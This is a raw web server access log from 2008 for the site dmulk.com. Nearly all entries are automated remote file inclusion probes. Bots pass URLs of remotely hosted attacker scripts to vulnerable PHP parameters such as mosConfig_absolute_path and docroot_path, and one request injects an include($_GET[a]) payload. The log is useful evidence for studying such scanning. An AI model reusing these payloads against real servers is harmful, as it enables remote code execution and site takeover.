87.230.17.22 - - [06/Jul/2008:11:37:14 -0700] "GET /logs//?_SESSION%5Bdocroot_path%5D=http://www.e-learning.globalfree.net/ispo/bauu/pr0t/test?? HTTP/1.1" 200 54997 "-" "Mozilla/4.0 (compatible; MSIE 5.0; SunOS 5.9 sun4u; X11)" "www.dmulk.com"
87.230.17.22 - - [06/Jul/2008:11:37:19 -0700] "GET //?_SESSION%5Bdocroot_path%5D=http://www.e-learning.globalfree.net/ispo/bauu/pr0t/test?? HTTP/1.1" 200 18459 "-" "Mozilla/4.0 (compatible; MSIE 5.0; SunOS 5.9 sun4u; X11)" "www.dmulk.com"
66.7.208.173 - - [06/Jul/2008:11:37:20 -0700] "GET //program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://www.duvenbeck.de/contenido/logs/idnew.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
66.7.208.173 - - [06/Jul/2008:11:37:20 -0700] "GET /logs//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://www.duvenbeck.de/contenido/logs/idnew.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.185.238.20 - - [06/Jul/2008:11:37:34 -0700] "GET /logs/access_080326.log/errors.php?error=http://www.amigurumiland.com/mc-root/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
64.185.238.20 - - [06/Jul/2008:11:37:35 -0700] "GET /errors.php?error=http://www.amigurumiland.com/mc-root/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
64.185.238.20 - - [06/Jul/2008:11:37:35 -0700] "GET /logs/errors.php?error=http://www.amigurumiland.com/mc-root/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
64.185.238.20 - - [06/Jul/2008:11:38:09 -0700] "GET /logs/access_080326.log/errors.php?error=http://www.amigurumiland.com/mc-root/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
64.185.238.20 - - [06/Jul/2008:11:38:10 -0700] "GET /logs/errors.php?error=http://www.amigurumiland.com/mc-root/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
212.227.65.79 - - [06/Jul/2008:11:38:18 -0700] "GET /logs/access_080117.log//?_SESSION%5Bdocroot_path%5D=http://www.wocken-industriebedarf.de/contenido/cronjobs/rfi-response.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
212.227.65.79 - - [06/Jul/2008:11:38:19 -0700] "GET /logs//?_SESSION%5Bdocroot_path%5D=http://www.wocken-industriebedarf.de/contenido/cronjobs/rfi-response.txt??? HTTP/1.1" 200 54997 "-" "libwww-perl/5.76" "www.dmulk.com"
212.227.65.79 - - [06/Jul/2008:11:38:20 -0700] "GET //?_SESSION%5Bdocroot_path%5D=http://www.wocken-industriebedarf.de/contenido/cronjobs/rfi-response.txt??? HTTP/1.1" 200 18509 "-" "libwww-perl/5.76" "www.dmulk.com"
212.227.65.79 - - [06/Jul/2008:11:38:22 -0700] "GET /logs/access_071224.log//?_SESSION%5Bdocroot_path%5D=http://www.wocken-industriebedarf.de/contenido/cronjobs/rfi-response.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
62.75.152.96 - - [06/Jul/2008:11:38:24 -0700] "GET /logs/access_080117.log//?_SESSION%5Bdocroot_path%5D=http://www.wocken-industriebedarf.de/contenido/cronjobs/rfi-response.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
62.75.152.96 - - [06/Jul/2008:11:38:24 -0700] "GET /logs//?_SESSION%5Bdocroot_path%5D=http://www.wocken-industriebedarf.de/contenido/cronjobs/rfi-response.txt??? HTTP/1.1" 200 54997 "-" "libwww-perl/5.803" "www.dmulk.com"
62.75.152.96 - - [06/Jul/2008:11:38:27 -0700] "GET //?_SESSION%5Bdocroot_path%5D=http://www.wocken-industriebedarf.de/contenido/cronjobs/rfi-response.txt??? HTTP/1.1" 200 18509 "-" "libwww-perl/5.803" "www.dmulk.com"
62.75.152.96 - - [06/Jul/2008:11:38:28 -0700] "GET /logs/access_071224.log//?_SESSION%5Bdocroot_path%5D=http://www.wocken-industriebedarf.de/contenido/cronjobs/rfi-response.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
89.108.64.164 - - [06/Jul/2008:11:38:51 -0700] "GET /logs/book.php5?page=http://www.secondhandshop55.de/content//contenido/classes/updates? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.108.64.164 - - [06/Jul/2008:11:38:52 -0700] "GET /book.php5?page=http://www.secondhandshop55.de/content//contenido/classes/updates? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
83.18.242.34 - - [06/Jul/2008:11:38:58 -0700] "GET /logs/access_080313.log//appserv/main.php?appserv_root=http://senzakiakkiere.altervista.org/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
83.18.242.34 - - [06/Jul/2008:11:39:12 -0700] "GET /logs/access_080215.log//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://senzakiakkiere.altervista.org/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
80.86.123.123 - - [06/Jul/2008:11:39:20 -0700] "GET /logs/access.log/errors.php?error=http://www.diakonissenkrankenhaus.de/includes/phpmailer/sys_cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.dmulk.com"
80.86.123.123 - - [06/Jul/2008:11:39:20 -0700] "GET /logs/access.log/errors.php?error=http://www.diakonissenkrankenhaus.de/includes/phpmailer/sys_cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.dmulk.com"
80.86.123.123 - - [06/Jul/2008:11:39:21 -0700] "GET /errors.php?error=http://www.diakonissenkrankenhaus.de/includes/phpmailer/sys_cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.dmulk.com"
80.86.123.123 - - [06/Jul/2008:11:39:21 -0700] "GET /errors.php?error=http://www.diakonissenkrankenhaus.de/includes/phpmailer/sys_cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.dmulk.com"
80.86.123.123 - - [06/Jul/2008:11:39:21 -0700] "GET /logs/errors.php?error=http://www.diakonissenkrankenhaus.de/includes/phpmailer/sys_cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.dmulk.com"
80.86.123.123 - - [06/Jul/2008:11:39:22 -0700] "GET /logs/errors.php?error=http://www.diakonissenkrankenhaus.de/includes/phpmailer/sys_cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.dmulk.com"
83.18.242.34 - - [06/Jul/2008:11:39:42 -0700] "GET /logs/access_080215.log//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://senzakiakkiere.altervista.org/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
77.221.130.15 - - [06/Jul/2008:11:39:43 -0700] "GET /logs/modules/My_eGallery/index.php?basepath=http://www.urabaenlinea.com/phpbb2//language/lang_english/id.txt HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
77.221.130.15 - - [06/Jul/2008:11:39:44 -0700] "GET /modules/My_eGallery/index.php?basepath=http://www.urabaenlinea.com/phpbb2//language/lang_english/id.txt HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
69.94.56.40 - - [06/Jul/2008:11:39:51 -0700] "GET /logs/access_080118.log/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://h1.ripway.com/deaddevil/id.txt? HTTP/1.0" 404 275 "-" "libwww-perl/5.48" "www.dmulk.com"
69.94.56.40 - - [06/Jul/2008:11:39:51 -0700] "GET /components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://h1.ripway.com/deaddevil/id.txt? HTTP/1.0" 404 275 "-" "libwww-perl/5.48" "www.dmulk.com"
69.94.56.40 - - [06/Jul/2008:11:39:51 -0700] "GET /logs/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://h1.ripway.com/deaddevil/id.txt? HTTP/1.0" 404 275 "-" "libwww-perl/5.48" "www.dmulk.com"
204.15.120.73 - - [06/Jul/2008:11:40:18 -0700] "GET /logs/access_080315.log/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.diakonissenkrankenhaus.de/includes/phpmailer/sys_cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.dmulk.com"
204.15.120.73 - - [06/Jul/2008:11:40:18 -0700] "GET /logs/access_080315.log/errors.php?error=http://www.diakonissenkrankenhaus.de/includes/phpmailer/sys_cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.dmulk.com"
204.15.120.73 - - [06/Jul/2008:11:40:19 -0700] "GET /components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.diakonissenkrankenhaus.de/includes/phpmailer/sys_cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.dmulk.com"
204.15.120.73 - - [06/Jul/2008:11:40:19 -0700] "GET /errors.php?error=http://www.diakonissenkrankenhaus.de/includes/phpmailer/sys_cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.dmulk.com"
204.15.120.73 - - [06/Jul/2008:11:40:19 -0700] "GET /logs/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.diakonissenkrankenhaus.de/includes/phpmailer/sys_cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.dmulk.com"
204.15.120.73 - - [06/Jul/2008:11:40:19 -0700] "GET /logs/errors.php?error=http://www.diakonissenkrankenhaus.de/includes/phpmailer/sys_cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.dmulk.com"
69.94.56.40 - - [06/Jul/2008:11:40:35 -0700] "GET /logs/access_080329.log/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://h1.ripway.com/deaddevil/id.txt? HTTP/1.0" 404 275 "-" "libwww-perl/5.48" "www.dmulk.com"
212.227.251.172 - - [06/Jul/2008:11:41:07 -0700] "GET //index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.motociclismo.pt/images/Equipa/jpg.txt? HTTP/1.1" 200 3694 "-" "libwww-perl/5.805" "www.dmulk.com"
193.53.87.81 - - [06/Jul/2008:11:41:07 -0700] "GET /blog/index.php/2008/04/12/great-day-for-a-ride/ HTTP/1.0" 200 11509 "http://dmulk.com/blog/2008/04/12/great-day-for-a-ride/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; MRA 4.6 (build 01425))" "dmulk.com"
212.227.251.172 - - [06/Jul/2008:11:41:07 -0700] "GET //index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://www.motociclismo.pt/images/Equipa/jpg.txt? HTTP/1.1" 200 3694 "-" "libwww-perl/5.805" "www.dmulk.com"
193.53.87.81 - - [06/Jul/2008:11:41:12 -0700] "POST /blog/wp-comments-post.php HTTP/1.0" 302 1 "http://dmulk.com/blog/2008/04/12/great-day-for-a-ride/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; MRA 4.6 (build 01425))" "dmulk.com"
89.108.64.164 - - [06/Jul/2008:11:41:17 -0700] "GET /logs/access_080329.log/administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.tukangbecak.com/ban.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
218.194.80.230 - - [06/Jul/2008:11:41:37 -0700] "GET /logs/access_080114.log HTTP/1.1" 200 393216 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.dmulk.com"
74.6.17.170 - - [06/Jul/2008:11:42:12 -0700] "GET /blog/index.php/2008/06/05/?show=gallery&nggpage=2 HTTP/1.0" 200 27121 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "dmulk.com"
67.15.70.45 - - [06/Jul/2008:11:42:14 -0700] "GET /logs/home.php?pagina=http://servitis-web.com/ftdc/r0x.gif????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
67.15.70.45 - - [06/Jul/2008:11:42:14 -0700] "GET /home.php?pagina=http://servitis-web.com/ftdc/r0x.gif????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
66.7.208.173 - - [06/Jul/2008:11:42:19 -0700] "GET /logs/access_080117.log//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://www.duvenbeck.de/contenido/logs/idnew.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
66.7.208.173 - - [06/Jul/2008:11:42:20 -0700] "GET //program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://www.duvenbeck.de/contenido/logs/idnew.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
83.18.242.34 - - [06/Jul/2008:11:42:20 -0700] "GET /logs/access_071225.log//includes?vwar_root=http://senzakiakkiere.altervista.org/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
66.7.208.173 - - [06/Jul/2008:11:42:21 -0700] "GET /logs//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://www.duvenbeck.de/contenido/logs/idnew.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
83.18.242.34 - - [06/Jul/2008:11:42:48 -0700] "GET /logs//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://senzakiakkiere.altervista.org/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
66.7.208.173 - - [06/Jul/2008:11:42:53 -0700] "GET /logs/access_080215.log//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://www.duvenbeck.de/contenido/logs/idnew.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
83.18.242.34 - - [06/Jul/2008:11:42:54 -0700] "GET //include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://senzakiakkiere.altervista.org/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
77.232.68.17 - - [06/Jul/2008:11:42:55 -0700] "GET /logs//components/com_flyspray/startdown.php?file=http://pemlk.iespana.es/tools/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
77.232.68.17 - - [06/Jul/2008:11:42:55 -0700] "GET //components/com_flyspray/startdown.php?file=http://pemlk.iespana.es/tools/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
212.227.65.79 - - [06/Jul/2008:11:42:58 -0700] "GET /logs/access_080215.log//?_SESSION%5Bdocroot_path%5D=http://www.wocken-industriebedarf.de/contenido/cronjobs/rfi-response.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
74.6.17.170 - - [06/Jul/2008:11:43:04 -0700] "GET /blog/index.php/2008/06/05/?show=gallery&nggpage=2 HTTP/1.0" 200 27121 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "dmulk.com"
74.6.17.170 - - [06/Jul/2008:11:44:05 -0700] "GET /blog/index.php/2008/06/05/?show=gallery&nggpage=2 HTTP/1.0" 200 27121 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "dmulk.com"
69.94.56.40 - - [06/Jul/2008:11:44:10 -0700] "GET /logs/access_071225.log//index.php?subpage=http://h1.ripway.com/deaddevil/id.txt? HTTP/1.0" 404 275 "-" "libwww-perl/5.48" "www.dmulk.com"
69.94.56.40 - - [06/Jul/2008:11:44:12 -0700] "GET //index.php?subpage=http://h1.ripway.com/deaddevil/id.txt? HTTP/1.0" 200 18371 "-" "libwww-perl/5.48" "www.dmulk.com"
69.94.56.40 - - [06/Jul/2008:11:44:12 -0700] "GET /logs//index.php?subpage=http://h1.ripway.com/deaddevil/id.txt? HTTP/1.0" 404 275 "-" "libwww-perl/5.48" "www.dmulk.com"
69.94.56.40 - - [06/Jul/2008:11:44:20 -0700] "GET /logs/access_080201.log//index.php?subpage=http://h1.ripway.com/deaddevil/id.txt? HTTP/1.0" 404 275 "-" "libwww-perl/5.48" "www.dmulk.com"
66.80.93.168 - - [06/Jul/2008:11:44:24 -0700] "GET /logs/access.log/administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.tukangbecak.com/ban.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
66.80.93.168 - - [06/Jul/2008:11:44:50 -0700] "GET /logs/access.log/administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.tukangbecak.com/ban.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
204.15.120.73 - - [06/Jul/2008:11:44:58 -0700] "GET /logs/access_080220.log/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.diakonissenkrankenhaus.de/includes/phpmailer/sys_cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.dmulk.com"
204.15.120.73 - - [06/Jul/2008:11:44:58 -0700] "GET /logs/access_080220.log/errors.php?error=http://www.diakonissenkrankenhaus.de/includes/phpmailer/sys_cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.dmulk.com"
218.104.188.3 - - [06/Jul/2008:11:46:20 -0700] "GET /logs/access_080315.log//component/errors.php?error=http://senzakiakkiere.altervista.org/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
218.104.188.3 - - [06/Jul/2008:11:46:25 -0700] "GET /logs/access_080315.log//component/errors.php?error=http://senzakiakkiere.altervista.org/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
195.54.9.218 - - [06/Jul/2008:11:46:34 -0700] "GET //class/class.dashboard_lms.php?where_framework=http://www.geneseobeadstudio.com/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
91.186.11.35 - - [06/Jul/2008:11:49:27 -0700] "GET /logs//administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.snatomania.altervista.org/saday%3C/text.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
91.186.11.35 - - [06/Jul/2008:11:49:28 -0700] "GET //administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.snatomania.altervista.org/saday%3C/text.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
91.186.11.35 - - [06/Jul/2008:11:49:29 -0700] "GET /logs/access_080329.log//administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.snatomania.altervista.org/saday%3C/text.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
91.186.11.35 - - [06/Jul/2008:11:49:29 -0700] "GET //administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.snatomania.altervista.org/saday%3C/text.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
91.186.11.35 - - [06/Jul/2008:11:49:29 -0700] "GET /logs//administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.snatomania.altervista.org/saday%3C/text.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
91.186.11.35 - - [06/Jul/2008:11:49:42 -0700] "GET /logs/access_080313.log//administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.snatomania.altervista.org/saday%3C/text.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
91.186.11.35 - - [06/Jul/2008:11:49:43 -0700] "GET //administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.snatomania.altervista.org/saday%3C/text.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
91.186.11.35 - - [06/Jul/2008:11:49:43 -0700] "GET /logs//administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.snatomania.altervista.org/saday%3C/text.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
91.186.11.35 - - [06/Jul/2008:11:49:49 -0700] "GET /logs/access.log//administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.snatomania.altervista.org/saday%3C/text.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
213.254.218.40 - - [06/Jul/2008:11:50:03 -0700] "GET /logs/index.php?modules=http://www.diakonissenkrankenhaus.de/includes/phpmailer/sys_cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.dmulk.com"
213.254.218.40 - - [06/Jul/2008:11:50:03 -0700] "GET /logs/errors.php?error=http://www.diakonissenkrankenhaus.de/includes/phpmailer/sys_cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.dmulk.com"
91.186.11.35 - - [06/Jul/2008:11:50:05 -0700] "GET /logs/access_080329.log//administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.snatomania.altervista.org/saday%3C/text.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
91.186.11.35 - - [06/Jul/2008:11:50:06 -0700] "GET //administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.snatomania.altervista.org/saday%3C/text.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
91.186.11.35 - - [06/Jul/2008:11:50:06 -0700] "GET /logs//administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.snatomania.altervista.org/saday%3C/text.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
213.254.218.40 - - [06/Jul/2008:11:50:07 -0700] "GET /index.php?modules=http://www.diakonissenkrankenhaus.de/includes/phpmailer/sys_cr4nk/i? HTTP/1.1" 200 18469 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.dmulk.com"
213.254.218.40 - - [06/Jul/2008:11:50:08 -0700] "GET /errors.php?error=http://www.diakonissenkrankenhaus.de/includes/phpmailer/sys_cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.dmulk.com"
202.164.225.11 - - [06/Jul/2008:11:50:26 -0700] "GET /logs/access_080327.log//index.php?option=com_flyspray&Itemid=&mosConfig_absolute_path=http://www.coronaclub.it/pk_gallery/photos/25/11828333/idilegal.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
202.164.225.11 - - [06/Jul/2008:11:50:28 -0700] "GET //index.php?option=com_flyspray&Itemid=&mosConfig_absolute_path=http://www.coronaclub.it/pk_gallery/photos/25/11828333/idilegal.txt??? HTTP/1.1" 200 18589 "-" "libwww-perl/5.803" "www.dmulk.com"
202.164.225.11 - - [06/Jul/2008:11:50:29 -0700] "GET /logs//index.php?option=com_flyspray&Itemid=&mosConfig_absolute_path=http://www.coronaclub.it/pk_gallery/photos/25/11828333/idilegal.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
91.186.11.35 - - [06/Jul/2008:11:51:02 -0700] "GET /logs//administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.snatomania.altervista.org/saday%3C/text.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
91.186.11.35 - - [06/Jul/2008:11:51:02 -0700] "GET //administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.snatomania.altervista.org/saday%3C/text.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
213.218.137.34 - - [06/Jul/2008:11:51:03 -0700] "GET /logs/access_080313.log//administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.snatomania.altervista.org/saday%3C/text.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
213.218.137.34 - - [06/Jul/2008:11:51:04 -0700] "GET /logs/access_080313.log//administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.snatomania.altervista.org/saday%3C/text.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
213.218.137.34 - - [06/Jul/2008:11:51:04 -0700] "GET //administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.snatomania.altervista.org/saday%3C/text.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
213.218.137.34 - - [06/Jul/2008:11:51:04 -0700] "GET //administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.snatomania.altervista.org/saday%3C/text.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
213.218.137.34 - - [06/Jul/2008:11:51:04 -0700] "GET /logs//administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.snatomania.altervista.org/saday%3C/text.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
213.218.137.34 - - [06/Jul/2008:11:51:04 -0700] "GET /logs//administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.snatomania.altervista.org/saday%3C/text.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
202.164.225.11 - - [06/Jul/2008:11:51:15 -0700] "GET /logs/access_080229.log//index.php?option=com_flyspray&Itemid=&mosConfig_absolute_path=http://www.coronaclub.it/pk_gallery/photos/25/11828333/idilegal.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
91.186.11.35 - - [06/Jul/2008:11:51:27 -0700] "GET /logs/access.log//administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.snatomania.altervista.org/saday%3C/text.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
91.186.11.35 - - [06/Jul/2008:11:51:34 -0700] "GET /logs//administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.snatomania.altervista.org/saday%3C/text.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
91.186.11.35 - - [06/Jul/2008:11:51:34 -0700] "GET //administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.snatomania.altervista.org/saday%3C/text.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
213.218.137.34 - - [06/Jul/2008:11:51:36 -0700] "GET /logs/access.log//administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.snatomania.altervista.org/saday%3C/text.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
213.218.137.34 - - [06/Jul/2008:11:51:36 -0700] "GET /logs/access.log//administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.snatomania.altervista.org/saday%3C/text.txt? HTTP/1.1" 404 275 "-" "libww